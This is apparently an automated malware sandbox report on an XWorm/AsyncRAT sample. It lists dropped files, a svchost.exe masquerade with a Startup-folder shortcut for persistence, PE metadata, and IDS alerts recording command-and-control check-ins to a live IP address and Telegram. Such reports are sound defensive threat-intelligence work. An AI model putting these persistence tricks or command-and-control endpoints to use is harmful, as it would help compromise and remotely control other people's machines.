SHA-512:	FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1eesaedm.0gz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22zaeb0w.g0a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kbqhrel.ut2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agesxp1d.nah.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc2kmm3v.0qb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etewax5f.sw1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqpsser0.l3d.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qobfazny.0fd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4f3cemm.yfx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnumhc4n.afc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sybuh4nv.x1w.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugwwonhs.xtg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl0s3x4r.rgx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoyoil5b.itp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yckccs03.alk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxe3vo2v.n1y.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\svchost.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	74240
Entropy (8bit):	5.9616079817725645
Encrypted:	false
SSDEEP:	1536:8C7dCCRXek2ycziKLGIp78eax9xbMxioyAgDd+E6V186Oc8E2el:p7MKOHXBGVpxbIEAgRA1dOcYel
MD5:	8D52069BD117DA94E0B0B70E73E33FB0
SHA1:	E8090ADDDFF167E1BDA4194AF968BA4BC22A2D60
SHA-256:	B3E217C467CFE1E8079E82B88F2F99950A9459330A8843070EBB34BF3E2BCF38
SHA-512:	7A91EEB0CF3EDB53D0AC3D51ABE85C97BB09DA5B334B387FDA90144A2F3729693367C451FEE9E04CB953DCF8D9D1B91EE12961BFE9F1E53C0AB06AABABD696ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\svchost.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.?g............................N6... ...@....@.. ....................................@..................................5..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B................06......H.......\|d..x.......&.....................................................(.....r...p. .3 ...(.....rG..p. ..9..s.........s.........s.........s..........r...p. .+..r...p. .{...r...p. E/...r"..p. .+A..r...p. S.....((....r<..p. .C...r...p. ..."(....+."(....+.&("...&+..+5sc... .... .'..od...(,...~....-.(M...(?...~....oe...&.-..rn..p. .....r...p. .....r\|..p.r...p. .....r...p.r...p. v....r...p. .....r...p*..............j..................sf..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 21 20:22:03 2024, mtime=Thu Nov 21 20:22:03 2024, atime=Thu Nov 21 20:22:03 2024, length=74240, window=hide
Category:	dropped
Size (bytes):	959
Entropy (8bit):	5.076055209297009
Encrypted:	false
SSDEEP:	12:8g04x/B4WCyz7daJziRfBJ8FgdjAIfA/e13gUNwuLGhYA444t2YZ/elFlSJmZmV:8kHjZz7oziRQGZAIfA/eV7c/qyFm
MD5:	21589B93FCBC68574E1C59761DCF6586
SHA1:	814B4F0369BC6C1EC3715D3BC1F263EA53EBB258
SHA-256:	6DE69CF5AC0FD04D2904E272B46AE5AD984681268996F9C0764D199E565C619A
SHA-512:	B73782A25AF16310968E0706CEE68CB23783CE529D1861482492EDB549EB87750946B1C63382343978EE6EA7816641E06CC2AF303D5A7981988BE2EA0182A7EA
Malicious:	false
Preview:	L..................F.... ...B..i[<..B..i[<..B..i[<..."......................p.:..DG..Yr?.D..U..k0.&...&......vk.v.....".>[<...h.i[<......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^uY.............................%..A.p.p.D.a.t.a...B.P.1.....uY....Local.<......CW.^uY......b.........................L.o.c.a.l.....b.2.."..uY. .svchost.exe.H......uY.uY...............................s.v.c.h.o.s.t...e.x.e.......W...............-.......V...................C:\Users\user\AppData\Local\svchost.exe..#.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.s.v.c.h.o.s.t...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......045012...........hT..CrF.f4... .D...N....,.......hT..CrF.f4... .D...N....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.9616079817725645
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	file.exe
File size:	74'240 bytes
MD5:	8d52069bd117da94e0b0b70e73e33fb0
SHA1:	e8090adddff167e1bda4194af968ba4bc22a2d60
SHA256:	b3e217c467cfe1e8079e82b88f2f99950a9459330a8843070ebb34bf3e2bcf38
SHA512:	7a91eeb0cf3edb53d0ac3d51abe85c97bb09da5b334b387fda90144a2f3729693367c451fee9e04cb953dcf8d9d1b91ee12961bfe9f1e53c0ab06aababd696ed
SSDEEP:	1536:8C7dCCRXek2ycziKLGIp78eax9xbMxioyAgDd+E6V186Oc8E2el:p7MKOHXBGVpxbIEAgRA1dOcYel
TLSH:	22737C1877E24529D5FF7FF509F13262DA79F2231903DA5F24D6058A2623ACACC80AF5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.?g............................N6... ...@....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x41364e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673F1F67 [Thu Nov 21 11:54:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x135f4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x4c6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x16000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x11654	0x11800	5b9ed3b597bad2b3f8bbaf6e9ed1ac34	False	0.5898018973214286	data	6.0358296553925666	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x4c6	0x600	24d8d8a47ec19e29da972c6bddca1aff	False	0.3723958333333333	data	3.6934252048864114	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x16000	0xc	0x200	0ea496ef717341301189186622ff9471	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x140a0	0x23c	data			0.47202797202797203
RT_MANIFEST	0x142dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T22:21:01.851871+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	20.189.173.21	443	TCP
2024-11-21T22:22:07.016128+0100	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	192.168.2.4	49749	149.154.167.220	443	TCP
2024-11-21T22:22:14.748492+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:21.488080+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:21.558331+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49755	87.120.112.33	8398	TCP
2024-11-21T22:22:28.854472+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:35.196511+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:35.200060+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49755	87.120.112.33	8398	TCP
2024-11-21T22:22:35.586248+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:42.240444+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:48.648005+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:48.649987+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49755	87.120.112.33	8398	TCP
2024-11-21T22:22:49.359041+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:49.569088+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:49.569088+0100	2858924	ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:55.621654+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:23:01.060097+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:23:06.834762+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:23:07.729313+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.4	49755	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 22:22:04.880490065 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:04.880573988 CET	443	49749	149.154.167.220	192.168.2.4
Nov 21, 2024 22:22:04.880697966 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:04.890496969 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:04.890530109 CET	443	49749	149.154.167.220	192.168.2.4
Nov 21, 2024 22:22:06.357068062 CET	443	49749	149.154.167.220	192.168.2.4
Nov 21, 2024 22:22:06.357155085 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:06.360060930 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:06.360081911 CET	443	49749	149.154.167.220	192.168.2.4
Nov 21, 2024 22:22:06.360491991 CET	443	49749	149.154.167.220	192.168.2.4
Nov 21, 2024 22:22:06.400813103 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:06.411943913 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:06.459374905 CET	443	49749	149.154.167.220	192.168.2.4
Nov 21, 2024 22:22:07.016227961 CET	443	49749	149.154.167.220	192.168.2.4
